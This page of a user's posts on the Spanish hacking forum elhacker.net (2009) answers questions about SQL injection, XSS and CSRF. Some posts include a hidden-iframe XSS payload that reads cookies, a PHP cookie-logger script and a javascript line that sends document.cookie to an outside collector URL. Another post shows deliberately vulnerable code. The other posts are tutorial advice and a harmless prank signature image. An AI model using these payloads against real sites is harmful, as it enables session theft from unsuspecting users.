elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 [403] 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 ... 456
4021  Seguridad Informática / Nivel Web / Re: Un empujon en las inyecciones sql (Mysql) en: 5 Marzo 2009, 06:41 am
Hola, veo que necesitas aprender primero lo que es MySQL, como se programa, etc. Es dificil poder entender una inyección SQL si no sabes de SQL, te recomiendo que de pasada puedas aprender algo de php así que deberías buscar por ahi esos tutos donde enseñan sobre php+mysql y en base a eso vas leyendo de a poco sobre inyecciones.

http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t237420.0.html

Talves ese tema te pueda aclarar muchas cosas.

Citar
cuando introduces una ' produce un error de sintaxis, ¿esto ya quiere decir que es vulnerable?
No siempre pero si la mayoria de las veces.

Citar
y si es así, ¿cual es el siguiente paso?
Depende de lo que quieras lograr o a que vas, cuales son tus intenciones ya que en base a eso es lo que necesitarás hacer y para hacer necesitas primeramente lo que te dije antes.

Si te quedan mas dudas puedes ver algunos textos acá:
https://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_23209-t244090.0.html
http://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL
http://www.google.cl/search?hl=es&q=programacion+php%2Bmysql&btnG=Buscar&meta=

Si con todo esto sigues con dudas buelves y preguntas lo que desees.
4022  Seguridad Informática / Nivel Web / Re: gmail CSRF en: 4 Marzo 2009, 22:05 pm
http://packetstormsecurity.org/0903-exploits/gmail-xsrf.txt

Porque si la falla no aparece en milw0rm, packet storm, securityfocus, etc entonces no se parcha a menos que lo reportes directamente pero olvidate de que alguien de Google se va a dar el tiempo de buscar vulnerabilidades o de visitar sitios donde puedan dar algún indicio de estas fallas, en otras palabras puedes publicar un agujero de paypal en este foro y mientras no sea publicado en sitios de advisories conocidos entonces nunca lo sabrán (no significa que esté permitido hacerlo :P).
4023  Seguridad Informática / Nivel Web / Re: Duda sobre XSS en: 3 Marzo 2009, 21:03 pm
o con onload="alert(document.cookie)" pero si vas a hacer eso ps entonces mejor pones el javascript de plano en el html incrustado pero para que no se vea o por lo menos se disimule que se haga en un iframe y que ese iframe contenga un javascript cifrado talves con "web encript" y que imprima un location hacia el xss, es mas, ni si quiera necesitas hacer eso, basta con php y un <?php header('location: ...'); ?> ya que desde ajáx no compartes sesiones como para compartir las cookies haciendo llamadas remotas. Es mas, ni si quiera necesitas insertar otro archivo en el iframe:

Código
  1. <?php
  2. $xss = 'x"><sCrIpT s=d>r=document; alert(r.cookie);</ScRiPt><br x="x';
  3. $distraccion[] =
  4. 'http://www.unaplauso.com/images/anuncios/3/9/7/793_animacion-payaso-pitiklin_2.jpg';
  5. $distraccion[] =
  6. 'http://www.ctv.es/USERS/hnostar/TECH/V9000/payaso.jpg';
  7. $distraccion[] =
  8. 'http://mikevsdinos.files.wordpress.com/2008/09/payaso.jpg';
  9. $distraccion[] =
  10. 'http://www.galeriade.com/Sirona/data/media/3/Payaso_Moderno_-_DSC_2512.jpg';
  11.  
  12. $distraccion = $distraccion[rand(0, (count($distraccion) - 1))];
  13. ?>
  14. <html>
  15. <img border="0" src="<?php echo $distraccion; ?>"/>
  16. <br />
  17. <iframe src="http://www.victima.com/vulnerable.php?variable=<?php
  18. echo urlencode($xss);
  19. ?>" width="1" height="1" frameborder="0"></iframe>
  20. </html>
4024  Seguridad Informática / WarZone / Re: Internal Server Error(hack web cross) en: 2 Marzo 2009, 22:07 pm
Eso pasa cuando presionas muy fuerte el botón isquierdo del mouse.
4025  Seguridad Informática / Nivel Web / Re: Duda sobre XSS en: 2 Marzo 2009, 21:13 pm
Código
  1. <?php
  2. /* VULN XSS */
  3. $_SESSION['x'] =  true;
  4. echo $_GET['x'];
  5.  
  6. ?>

Esa linea --> $_SESSION['x'] =  true; no le veo entido al igual que session_start() ya que no están siendo utilizadas, lo que necesitas es insertarle valores:

Código
  1. <?php
  2. /* VULN XSS */
  3. if(!$_COOKIE['x']){
  4. setcookie('x', 'test');
  5. $_COOKIE['x'] = 'test';
  6. }
  7. // echo nl2br(htmlspecialchars($_COOKIE['x'], ENT_QUOTES)); /* Forma correcta no vulnerable */
  8. echo $_COOKIE['x']; /* Forma incorrecta vulnerable */
  9. ?>

Con esto ya estás declarando el valor de la cookie y podrás probar con ella.
4026  Seguridad Informática / Nivel Web / Re: Duda sobre XSS en: 2 Marzo 2009, 03:06 am
Eso no debería funcionar a menos que el explorador sea vulnerable ya que cuando encierras una ejecución de script dentro de <img> esta no debería interpretar ningún tipo de código html y mucho menos javascript, por eso en las pruebas de concepto por lo general yo coloco un iframe de tamaño 1 pixel sin bordes ni scrollbars para evitar que se vea el punto de color negro.

Por lo que yo tengo entendido no puedes causar una ejecución arbitraria desde imagenes, hojas de estilos (a exepción de msie con expresion()), etc. Lo que si puedes hacer es causar un CSRF y esas cosas porque los headers se interpretan igual ya sean cookies, redirecciones, autentificación de acceso, etc.
4027  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Creación de nueva categoría en: 1 Marzo 2009, 23:44 pm
Citar
porque microsoft paga a los mods para no crear esa categoría
Y como crees que voy a tener para pagar la mensualidad de mi internet despues  :(
4028  Seguridad Informática / Nivel Web / Re: XSS no envia datos en: 1 Marzo 2009, 23:39 pm
Hay algunos servidores gratuitos y otros de pago donde por defecto traen un filtro bién pobre y molestoso, por ejemplo si usaste una variable llamada "act" en get entonces no te funcionará porque lo mas seguro es que te aparezca acceso denegado (asi pretenden evitar  una c99  :rolleyes:), en ese caso trata de cambiarlo. Intenta hacer pruebas tu mismo y haz esto:

Código
  1. <?php
  2.  
  3. die('Test: '.nl2br(htmlspecialchars($_GET['x'], ENT_QUOTES)));
  4.  
  5. $fp = fopen("datos.txt", "a+");
  6. $cookie = $_GET['x'];
  7. $salto = "\n-----------------------------\n";
  8. fwrite($fp,$salto);
  9. fwrite($fp,$cookie);
  10. fclose($fp);
  11. ?>

Luego vas probando...
Citar
cookies.php?x=prueba
Te debe aparecer "prueba", luego intentas con una cookie y vas a google y escribes arriba tu redirección y vas viendo que te aparece:
Citar
javascript:document.location='http://www.miweb.com/cookies.php?x='+document.cookie;

Si te aparece biéne toda la cokie y las demás cosas en cookies.php entonces significa que tienes rpoblemas al escribir sobre el archivo, intenta reemplazar "a+" por "x" en el fopen.
4029  Programación / PHP / Fake Exploit como firma en: 28 Febrero 2009, 05:49 am
Bueno, acá les dejo un pequeño código que hize para gastar una pequeña broma a los que vean esta firma:

Código
  1. <?php
  2. if(!verifica_so()){
  3. $texto[] = 'WHK@53rv3rh311:~# pl ./exploit.pl -verifica:'.$_SERVER[REMOTE_ADDR];
  4. $texto[] = ' [!] Sistema Operativo incompatible.';
  5. $texto[] = '';
  6. $texto[] = 'WHK@53rv3rh311:~#';
  7. }else{
  8. if(verifica_so() == 'win') $direccion = '0x00416FA0';
  9. if(verifica_so() == 'linux') $direccion = '0x00406F4C';
  10. if(verifica_so() == 'unix') $direccion = '0x00402360';
  11. $texto[] = 'WHK@53rv3rh311:~# pl ./exploit.pl -ip:'.$_SERVER[REMOTE_ADDR].' -so:'.verifica_so();
  12. $texto[] = ' --=[PoC BoF Linux/Win/Unix 2.5 Final by WHK]=--';
  13. $texto[] = ' [+] Conectando ...';
  14. $texto[] = ' [!] Retorno --> '.$direccion;
  15. $texto[] = ' [+] Lanzando ...';
  16. $texto[] = ' [+] Completado con éxito!';
  17. $texto[] = '';
  18. $texto[] = 'WHK@53rv3rh311:~#';
  19. }
  20.  
  21. $handle = imagecreate(400, 105);
  22.  
  23. $fondo = imagecolorallocate($handle, 0, 0, 0);
  24. $color_texto = imagecolorallocate($handle, 0, 255, 0);
  25. $salto = 5;
  26. foreach($texto as $linea){
  27. imagestring($handle, 2, 10, $salto, $linea, $color_texto);
  28. $salto = $salto + 12;
  29. }
  30. header("Content-type: image/png");
  31. imagepng($handle);
  32.  
  33. function verifica_so(){
  34. if(eregi('Windows', strtolower($_SERVER[HTTP_USER_AGENT]))) return 'win';
  35. if(eregi('linux', strtolower($_SERVER[HTTP_USER_AGENT]))) return 'linux';
  36. if(eregi('unix', strtolower($_SERVER[HTTP_USER_AGENT]))) return 'unix';
  37. return false;
  38. }
  39. ?>

Prueba:


Pueden modificarlo y cargarlo con imagenes no se, hagan lo que quieran con el código.
4030  Programación / PHP / Re: Tutorial: Crear area restringida con php en nuestra web en: 27 Febrero 2009, 03:40 am
Citar
como hacer el log off
Código
  1. function desloguear(){
  2. @setcookie('pass_login', '');
  3. $_COOKIES['pass_login'] = '';
  4. }

Citar
y creo que se puede hacer mas para evitar SQLi
Puedes utizar mysql_real_escape_string
http://cl.php.net/function.mysql-real-escape-string
Sin la necesidad de procesar todo en forma cifrada.
Páginas: 1 ... 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 [403] 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines